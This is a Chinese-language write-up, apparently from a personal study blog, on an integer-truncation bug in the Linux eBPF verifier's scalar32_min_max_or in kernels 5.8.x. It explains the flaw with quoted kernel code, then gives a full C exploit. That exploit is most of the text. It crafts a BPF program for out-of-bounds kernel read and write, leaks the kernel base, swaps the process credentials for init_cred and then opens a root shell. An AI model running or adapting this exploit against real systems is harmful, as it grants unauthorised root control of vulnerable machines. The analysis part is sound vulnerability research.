前言
影响版本:5.8.x
内核分支,v5.8.15
以及更低的版本
编译选项:CONFIG_BPF_SYSCALL
,config
所有带 BPF
字样的编译选项
漏洞概述:eBPF
验证程序中进行 or
操作时,scalar32_min_max_or
函数将 64 位的值赋值到 32 位的变量上,导致整数截断,进而错误计算了寄存器的范围,从而绕过bpf
的检查,导致越界读写
测试环境:测试环境 linux-5.8.14
该漏洞利用与之前分析的 CVE-2020-8835 几乎一模一样,所以比起该漏洞,漏洞发现者提出的 fuzz
思路更加有价值。当然笔者目前还没有开始学习 fuzz
,暂时不谈。
漏洞分析与利用
根据 patch 可知漏洞发生在 scalar32_min_max_or
函数中:
static void scalar32_min_max_or(struct bpf_reg_state *dst_reg,
struct bpf_reg_state *src_reg)
{
bool src_known = tnum_subreg_is_const(src_reg->var_off); // 检查低 src_reg 32 位是否已知
bool dst_known = tnum_subreg_is_const(dst_reg->var_off); // 检查低 dst_reg 32 位是否已知
struct tnum var32_off = tnum_subreg(dst_reg->var_off); // 取 dst_reg 的低 32 位
s32 smin_val = src_reg->smin_value; // 直接截断
u32 umin_val = src_reg->umin_value;
/* Assuming scalar64_min_max_or will be called so it is safe
* to skip updating register for known case.
*/
if (src_known && dst_known)
return;
/* We get our maximum from the var_off, and our minimum is the
* maximum of the operands' minima
*/
dst_reg->u32_min_value = max(dst_reg->u32_min_value, umin_val);
dst_reg->u32_max_value = var32_off.value | var32_off.mask;
if (dst_reg->s32_min_value < 0 || smin_val < 0) {
/* Lose signed bounds when ORing negative numbers,
* ain't nobody got time for that.
*/
dst_reg->s32_min_value = S32_MIN;
dst_reg->s32_max_value = S32_MAX;
} else {
/* ORing two positives gives a positive, so safe to
* cast result into s64.
*/
// 直接截断
dst_reg->s32_min_value = dst_reg->umin_value;
dst_reg->s32_max_value = dst_reg->umax_value;
}
}
可以看到在 if-else
分支的 else
分支中,直接将 dst_reg->umin_value/umax_value
赋值给了 dst_reg->s32_min_value/max_value
,这里导致了整数截断,与 cve-2020-8835
如出一辙。
漏洞触发链:
bpf_check
do_check_main
do_check_common
do_check
check_alu_op
adjust_reg_min_max_vals
adjust_scalar_min_max_vals
scalar32_min_max_or
想要成功执行到漏洞 else
分支,我们需要满足 dst_reg->s32_min_value >= 0
,否则就会走 if
分支直接设置 dst_reg->s32_min_value/max_value
为 S32_MIN/MAX
。
这里我使用的是 JSGE
去设置 dst_reg->min_value = 1
:
case BPF_JSGE:
case BPF_JSGT:
{
if (is_jmp32) {
s32 false_smax = opcode == BPF_JSGT ? sval32 : sval32 - 1;
s32 true_smin = opcode == BPF_JSGT ? sval32 + 1 : sval32;
false_reg->s32_max_value = min(false_reg->s32_max_value, false_smax);
true_reg->s32_min_value = max(true_reg->s32_min_value, true_smin);
} else {
s64 false_smax = opcode == BPF_JSGT ? sval : sval - 1;
s64 true_smin = opcode == BPF_JSGT ? sval + 1 : sval;
false_reg->smax_value = min(false_reg->smax_value, false_smax);
true_reg->smin_value = max(true_reg->smin_value, true_smin);
}
break;
}
然后会执行 __reg_combine_64_into_32
函数:
static void __reg_combine_64_into_32(struct bpf_reg_state *reg)
{
__mark_reg32_unbounded(reg);
if (__reg64_bound_s32(reg->smin_value))
reg->s32_min_value = (s32)reg->smin_value;
if (__reg64_bound_s32(reg->smax_value))
reg->s32_max_value = (s32)reg->smax_value;
if (__reg64_bound_u32(reg->umin_value))
reg->u32_min_value = (u32)reg->umin_value;
if (__reg64_bound_u32(reg->umax_value))
reg->u32_max_value = (u32)reg->umax_value;
/* Intersecting with the old var_off might have improved our bounds
* slightly. e.g. if umax was 0x7f...f and var_off was (0; 0xf...fc),
* then new var_off is (0; 0x7f...fc) which improves our umax.
*/
__reg_deduce_bounds(reg);
__reg_bound_offset(reg);
__update_reg_bounds(reg);
}
可以看到这里会将执行 reg->s32_min_value = (s32)reg->smin_value = 1
后面的利用就不多说了,详细见 cve-2020-8835
,exp
如下:
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <ctype.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <linux/bpf.h>
#include "bpf_insn.h"
void err_exit(char *msg)
{
printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
sleep(2);
exit(EXIT_FAILURE);
}
void info(char *msg)
{
printf("\033[35m\033[1m[+] %s\n\033[0m", msg);
}
void hexx(char *msg, size_t value)
{
printf("\033[32m\033[1m[+] %s: \033[0m%#lx\n", msg, value);
}
void binary_dump(char *desc, void *addr, int len) {
uint64_t *buf64 = (uint64_t *) addr;
uint8_t *buf8 = (uint8_t *) addr;
if (desc != NULL) {
printf("\033[33m[*] %s:\n\033[0m", desc);
}
for (int i = 0; i < len / 8; i += 4) {
printf(" %04x", i * 8);
for (int j = 0; j < 4; j++) {
i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");
}
printf(" ");
for (int j = 0; j < 32 && j + i * 8 < len; j++) {
printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
}
puts("");
}
}
/* root checker and shell poper */
void get_root_shell(void)
{
if(getuid()) {
puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
sleep(2);
exit(EXIT_FAILURE);
}
puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");
system("/bin/sh");
/* to exit the process normally, instead of segmentation fault */
exit(EXIT_SUCCESS);
}
/* bind the process to specific core */
void bind_core(int core)
{
cpu_set_t cpu_set;
CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}
static inline int bpf(int cmd, union bpf_attr *attr)
{
return syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}
static __always_inline int
bpf_map_create(unsigned int map_type, unsigned int key_size,
unsigned int value_size, unsigned int max_entries)
{
union bpf_attr attr = {
.map_type = map_type,
.key_size = key_size,
.value_size = value_size,
.max_entries = max_entries,
};
return bpf(BPF_MAP_CREATE, &attr);
}
static __always_inline int
bpf_map_lookup_elem(int map_fd, const void* key, void* value)
{
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t)key,
.value = (uint64_t)value,
};
return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}
static __always_inline int
bpf_map_update_elem(int map_fd, const void* key, const void* value, uint64_t flags)
{
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t)key,
.value = (uint64_t)value,
.flags = flags,
};
return bpf(BPF_MAP_UPDATE_ELEM, &attr);
}
static __always_inline int
bpf_map_delete_elem(int map_fd, const void* key)
{
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t)key,
};
return bpf(BPF_MAP_DELETE_ELEM, &attr);
}
static __always_inline int
bpf_map_get_next_key(int map_fd, const void* key, void* next_key)
{
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t)key,
.next_key = (uint64_t)next_key,
};
return bpf(BPF_MAP_GET_NEXT_KEY, &attr);
}
static __always_inline uint32_t
bpf_map_get_info_by_fd(int map_fd)
{
struct bpf_map_info info;
union bpf_attr attr = {
.info.bpf_fd = map_fd,
.info.info_len = sizeof(info),
.info.info = (uint64_t)&info,
};
bpf(BPF_OBJ_GET_INFO_BY_FD, &attr);
return info.btf_id;
}
int sockets[2];
int map_fd;
int expmap_fd;
int prog_fd;
uint32_t key;
uint64_t* value1;
uint64_t* value2;
uint64_t array_map_ops = 0xffffffff8226ea00;
uint64_t init_cred = 0xffffffff82c952c0; // D init_cred
uint64_t init_task = 0xffffffff82c160c0; // D init_task
uint64_t init_nsproxy = 0xffffffff82c94fe0; // D init_nsproxy
uint64_t map_addr = -1;
uint64_t koffset = -1;
uint64_t kbase = -1;
uint64_t tag = 0x6159617a6f616958;
uint64_t current_task;
struct bpf_insn prog[] = {
BPF_LD_MAP_FD(BPF_REG_1, 3), // r1 = [map_fd] = bpf_map ptr1
BPF_MOV64_IMM(BPF_REG_6, 0), // r6 = 0
BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_6, -8), // *(u64*)(fp -8) = 0
BPF_MOV64_REG(BPF_REG_7, BPF_REG_10), // r7 = fp
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, -8), // r7 = fp - 8
BPF_MOV64_REG(BPF_REG_2, BPF_REG_7), // r2 = r7 = fp - 8
BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), // args: r1 = bpf_map ptr1, r2 = fp - 8
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), // if r0 != 0 goto pc+1
BPF_EXIT_INSN(), // exit
BPF_MOV64_REG(BPF_REG_9, BPF_REG_0), // r9 = r0 = value_buf1 ptr
BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_9, 0), // r6 = value_buf1[0]
BPF_MOV64_IMM(BPF_REG_0, 0), // r0 = 0
BPF_JMP_IMM(BPF_JGE, BPF_REG_6, 1, 1), // inc r6.umin_value ==> r6.umin_value = 1
BPF_EXIT_INSN(), // exit
BPF_JMP_IMM(BPF_JSGE, BPF_REG_6, 1, 1), // inc r6.smin_value ==> r6.smin_value = 1
BPF_EXIT_INSN(), // exit
BPF_MOV64_IMM(BPF_REG_8, 1), // r8 = 1
BPF_ALU64_IMM(BPF_LSH, BPF_REG_8, 32), // r8 = 1 << 32 = 0x1 0000 0000
BPF_ALU64_IMM(BPF_ADD, BPF_REG_8, 1), // r8 = 0x1 0000 0001
BPF_JMP_REG(BPF_JLE, BPF_REG_6, BPF_REG_8, 1), // r6.umax_value = 0x1 0000 0001
BPF_EXIT_INSN(), // exit
BPF_ALU64_IMM(BPF_OR, BPF_REG_6, 0), // r6 or 0
BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 2), // r6 = r6 & 2 = 2 & 2 = 2
BPF_ALU64_IMM(BPF_RSH, BPF_REG_6, 1), // r6 = r6 >> 1 = 2 >> 1 = 1
BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0x110), // r6 = r6 * 0x110 = 1 * 0x110 = 0x110
BPF_LD_MAP_FD(BPF_REG_1, 4), // r1 = [expmap_fd] = bpf_map ptr2
BPF_MOV64_IMM(BPF_REG_8, 0), // r8 = 0
BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_8, -8), // *(uint64_t*)(fp - 8) = r8 = 0
BPF_MOV64_REG(BPF_REG_7, BPF_REG_10), // r7 = r10 = fp
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, -8), // r7 = r7 - 8 = fp - 8
BPF_MOV64_REG(BPF_REG_2, BPF_REG_7), // r2 = r7 = fp - 8
BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), // args: r1 = bpf_map ptr2, r2 = fp - 8
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), // if r0 <= r0 goto pc+1 right
BPF_EXIT_INSN(), // exit
BPF_MOV64_REG(BPF_REG_7, BPF_REG_0), // r7 = r0 = value_buf2 addr
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_6), // r7 = r7 - r6 = value_buf2 addr - 0x110
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0), // r8 = *(uint64_t*)r7 = value_buf2[-0x110/8] = array_map_ops
BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_8, 0x18), // *(uint64_t*)(r9 +0x18) = value_buf1[3] = r8 = array_map_ops
BPF_MOV64_REG(BPF_REG_2, BPF_REG_8), // r2 = r8 = array_map_ops
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0xc0), // r8 = *(uint64_t*)(r7 +0xc0) = value_buf2[-(0x110-0xc0)/8] = map_addr
BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_8, 0x20), // *(uint64_t*)(r9 +0x20) = value_buf1[4] = r8 = map_addr
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_9, 8), // r8 = *(uint64_t*)(r9 +8) = value_buf1[1] = arb_read addr
BPF_JMP_IMM(BPF_JEQ, BPF_REG_8, 0, 1), // if arb_read addr == NULL goto pc+1
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0x40), // *(uint64_t*)(r7 +0x40) = value_buf2[-(0x110-0x40)/8] = btf = r8
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_9, 0x10), // r8 = value_buf1[2] = fake_ops
BPF_JMP_IMM(BPF_JEQ, BPF_REG_8, 0, 4), // if arb_write flag == 0 goto pc+4
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0), // expmap's bpf_map_ops = r8 = fake_ops
BPF_ST_MEM(BPF_W, BPF_REG_7, 0x18, BPF_MAP_TYPE_STACK), // map_type = BPF_MAP_TYPE_STACK
BPF_ST_MEM(BPF_W, BPF_REG_7, 0x24, -1), // max_entries = -1
BPF_ST_MEM(BPF_W, BPF_REG_7, 0x2c, 0), // spin_lock_off = 0
BPF_ALU64_IMM(BPF_MOV, BPF_REG_0, 0),
BPF_EXIT_INSN(),
};
#define BPF_LOG_SZ 0x10000
char bpf_log_buf[BPF_LOG_SZ] = { '\0' };
union bpf_attr attr = {
.prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
.insns = (uint64_t) &prog,
.insn_cnt = sizeof(prog) / sizeof(prog[0]),
.license = (uint64_t) "GPL",
.log_level = 2,
.log_buf = (uint64_t) bpf_log_buf,
.log_size = BPF_LOG_SZ,
};
void init() {
setbuf(stdin, NULL);
setbuf(stdout, NULL);
setbuf(stderr, NULL);
}
void trigger() {
char buffer[64];
write(sockets[0], buffer, sizeof(buffer));
}
void prep() {
value1 = (uint64_t*)calloc(0x1000, 1);
value2 = (uint64_t*)calloc(0x1000, 1);
prctl(PR_SET_NAME, "XiaozaYa");
map_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x100, 1);
if (map_fd < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");
expmap_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x200, 1);
if (expmap_fd < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");
prog_fd = bpf(BPF_PROG_LOAD, &attr);
if (prog_fd < 0) puts(bpf_log_buf), perror("BPF_PROG_LOAD"), err_exit("BPF_PROG_LOAD");
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets) < 0)
perror("socketpair()"), err_exit("socketpair()");
if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd)) < 0)
perror("socketpair SO_ATTACH_BPF"), err_exit("socketpair()");
}
uint32_t arb_read_4_byte(uint64_t addr) {
value1[0] = 2;
value1[1] = addr - 0x58;
value1[2] = 0;
bpf_map_update_elem(map_fd, &key, value1, BPF_ANY);
bpf_map_update_elem(expmap_fd, &key, value2, BPF_ANY);
trigger();
return bpf_map_get_info_by_fd(expmap_fd);
}
uint64_t arb_read(uint64_t addr) {
uint64_t lo = arb_read_4_byte(addr);
uint64_t hi = arb_read_4_byte(addr+4);
return (hi << 32) | lo;
}
void prep_arb_write() {
uint64_t buf[0x200/8] = { 0 };
value1[0] = 2;
value1[1] = 0;
value1[2] = map_addr+0x110+0x20;
uint64_t fake_ops[] = {
0x0,0x0,0x0,0x0,
0xffffffff812713a0,
0xffffffff81272440,
0x0,
0xffffffff81271a10,
0xffffffff81271490,
0x0,0x0,
0xffffffff81250c40,
0x0,
0xffffffff81250a10,
0x0,
0xffffffff81271520,
0xffffffff81271890,
0xffffffff81271370,
0xffffffff81271490,
0x0,0x0,0x0,0x0,
0xffffffff81271f50,
0x0,
0xffffffff81271630,
0xffffffff81272250,
0x0,0x0,0x0,
0xffffffff81271420,
0xffffffff81271450,
0xffffffff812715c0,
0x0
};
for (int i = 0; i < sizeof(fake_ops) / 8; i++) {
if (fake_ops[i]) fake_ops[i] += koffset;
}
memcpy(value2, fake_ops, sizeof(fake_ops));
bpf_map_update_elem(map_fd, &key, value1, BPF_ANY);
bpf_map_update_elem(expmap_fd, &key, value2, BPF_ANY);
trigger();
}
void arb_write_4_byte(uint64_t addr, uint32_t val) {
value2[0] = val - 1;
bpf_map_update_elem(expmap_fd, &key, value2, addr);
}
void arb_write(uint64_t addr, uint64_t val) {
arb_write_4_byte(addr, val&0xffffffff);
arb_write_4_byte(addr+4, (val>>32)&0xffffffff);
}
void leak() {
uint64_t buf[0x200/8] = { 0 };
value1[0] = 2;
value1[1] = 0;
value1[2] = 0;
bpf_map_update_elem(map_fd, &key, value1, BPF_ANY);
bpf_map_update_elem(expmap_fd, &key, value2, BPF_ANY);
trigger();
memset(buf, 0, sizeof(buf));
bpf_map_lookup_elem(map_fd, &key, buf);
// binary_dump("LEAK DATA", buf, 0x100);
if ((buf[3] & 0xffffffff00000fff) == (array_map_ops & 0xffffffff00000fff)) {
koffset = buf[3] - array_map_ops;
kbase = 0xffffffff81000000 + koffset;
map_addr = buf[4] - 0xc0;
hexx("koffset", koffset);
hexx("kbase", kbase);
hexx("map_addr", map_addr);
}
if (koffset == -1) err_exit("FAILED to leak kernel base");
array_map_ops += koffset;
init_cred += koffset;
init_task += koffset;
init_nsproxy += koffset;
hexx("init_cred", init_cred);
hexx("init_task", init_task);
hexx("init_nsproxy", init_nsproxy);
current_task = init_task;
for (;;) {
if (arb_read(current_task+0xa58) == tag) {
break;
}
current_task = arb_read(current_task + 0x7a8) - 0x7a0;
}
hexx("current_task", current_task);
}
int main(int argc, char** argv, char** envp)
{
init();
prep();
leak();
prep_arb_write();
arb_write_4_byte(current_task+0xa48, init_cred&0xffffffff);
arb_write_4_byte(current_task+0xa48+2, (init_cred>>16)&0xffffffff);
arb_write_4_byte(current_task+0xa40, init_cred&0xffffffff);
arb_write_4_byte(current_task+0xa40+2, (init_cred>>16)&0xffffffff);
arb_write_4_byte(current_task+0xaa8, init_nsproxy&0xffffffff);
arb_write_4_byte(current_task+0xaa8+2, (init_nsproxy>>16)&0xffffffff);
get_root_shell();
// puts(bpf_log_buf);
puts("EXP NERVER END!");
return 0;
}
效果如下: